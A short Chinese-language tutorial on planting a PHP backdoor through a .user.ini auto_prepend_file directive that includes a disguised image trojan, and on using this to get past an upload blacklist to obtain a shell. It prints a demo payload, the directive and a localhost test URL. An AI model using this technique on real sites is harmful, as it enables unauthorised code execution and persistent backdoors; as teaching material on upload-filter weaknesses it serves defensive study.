.user.ini后门/上传黑名单绕过

.user.ini文件自动包含木马文件（后门）：

前提条件：

1.正常的php文件

2..user.ini文件

3.muma.gif图片马

利用步骤：

1、创建一个文件夹test，大家可能会有疑问，为什么还要再创建一个文件夹test，其实就是如果根目录本身就有user.ini的话，那么就会有影响，同样的会层层往上层目录寻找user.ini

2、test.php 内容为<?php echo 1;?>

3、muma.gif内容为<?php if(@$_GET[‘shell‘]==‘test‘){phpinfo();}?>

4、在".user.ini"文件写入：auto_prepend_file=muma.gif

浏览器访问：http://127.0.0.1/test/test.php?shell=test 则出现的为phpinfo()函数执行的效果

原理：

参考文章：https://www.php.net/manual/zh/configuration.file.per-user.php （.user.ini的解释）
参考文章：https://www.php.net/manual/zh/ini.list.php （php的配置项）

在 .user.ini 风格的ini文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别，这里就很清楚了，.user.ini实际上就是一个可以由用户"自定义"的php.ini，我们能够自定义的设置是模式为"PHP_INI_PERDIR 、 PHP_INI_USER"的设置。（上面表格中没有提到的PHP_INI_PERDIR，其实也可以在.user.ini中设置），实际上这里面没有说完整，其实除了PHP_INI_SYSTEM（里面包括了disable_functions、extension_dir、enable_dl）以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的，其中有个配置项auto_prepend_file就可以被利用导致后门的生成。

auto_prepend_file：指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。使用方法很简单，直接写在.user.ini中就可以了

疑问：.user.ini和.htaccess都可以作为后门，那有什么区别呢？

回答：它们两个都是动态加载，不需要web服务器进行重启生效，需要注意的就是.user.ini生效是根据user_ini.cache_ttl来决定的，默认是300s。比起.htaccess，.user.ini比用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。可谓很广，不像.htaccess有局限性。

参考文章：http://www.vuln.cn/6001

上传黑名单绕过：

某网站限制不允许上传.php文件，你便可以上传一个.user.ini，再上传一个图片马(如果只能上传jpg后缀的话)，包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了。